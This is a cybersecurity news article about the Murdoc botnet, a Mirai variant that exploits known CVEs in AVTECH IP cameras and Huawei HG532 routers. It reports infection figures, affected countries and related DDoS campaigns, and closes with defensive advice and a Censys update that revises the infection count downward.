Mirai Variant Murdoc Botnet Targets AVTECH IP Cameras and Huawei Routers

Cybersecurity experts have recently identified an extensive campaign designed to exploit vulnerabilities in AVTECH IP cameras and Huawei HG532 routers. This initiative has been largely successful in integrating these devices into a variant of the Mirai botnet known as the Murdoc Botnet.

The ongoing operations reflect a significant escalation in capabilities, as noted by Qualys security researcher Shilpesh Trivedi, who emphasized that the exploitation of these vulnerabilities has allowed attackers to compromise devices and expand their botnet networks substantially.

This malicious campaign has reportedly been active since at least July 2024, with over 1,370 affected systems tracked thus far. Notably, a substantial proportion of these infections have been confirmed in countries such as Malaysia, Mexico, Thailand, Indonesia, and Vietnam.

Research indicates that this botnet capitalizes on known security flaws—specifically CVE-2017-17215 and CVE-2024-7029—to initially breach Internet of Things (IoT) devices. Following access, a shell script is executed to download further malicious payloads based on the system’s CPU architecture. The overarching objective of these attacks involves leveraging the botnet to execute distributed denial-of-service (DDoS) attacks.

As of now, there are estimated to be more than 37,995 exposed AVTECH cameras globally, with the majority located in regions such as Taiwan, Vietnam, Indonesia, the United States, and Sri Lanka. This widespread exposure underscores the heightened risk associated with these particular devices.

In the weeks leading up to this revelation, another variant of the Mirai botnet—termed gayfemboy—was uncovered, exploiting vulnerabilities in Four-Faith industrial routers. Prior reports had highlighted that malicious entities had been utilizing CVE-2024-7029 to co-opt AVTECH devices into botnets.

Further investigations have revealed that recent DDoS attacks have targeted significant Japanese corporations and banks, with a focus on an IoT botnet assembled by exploiting device vulnerabilities and weak credentials. Attacks have also been reported in the U.S., Bahrain, Poland, Spain, Israel, and Russia, with the telecommunications and technology sectors notably affected.

Trend Micro has noted that the botnet includes variants derived from Mirai and BASHLITE, with commands that can integrate various DDoS methods, update malware, and enable proxy services. The attack methodology involves deploying loader malware that facilitates connections to command-and-control (C2) servers, thereby awaiting instructions for subsequent DDoS actions.

In response to these threats, cybersecurity professionals recommend vigilant monitoring of network activity, especially for any suspicious processes triggered by untrusted binaries or scripts. Ensuring firmware updates and altering default usernames and passwords for susceptible devices are crucial preventive measures.

Update

A report by the exposure management platform Censys indicates the presence of 221 Murdoc-infected hosts, primarily located in Indonesia, Singapore, Taiwan, the United States, and Hong Kong. This recent data suggests that previously reported figures may overestimate the number of compromised devices.

Censys has further clarified that some of the identified hosts exhibit “truncated” behaviors, responding on over 100 open ports—an anomaly that raises concerns regarding their authenticity as legitimate hosts.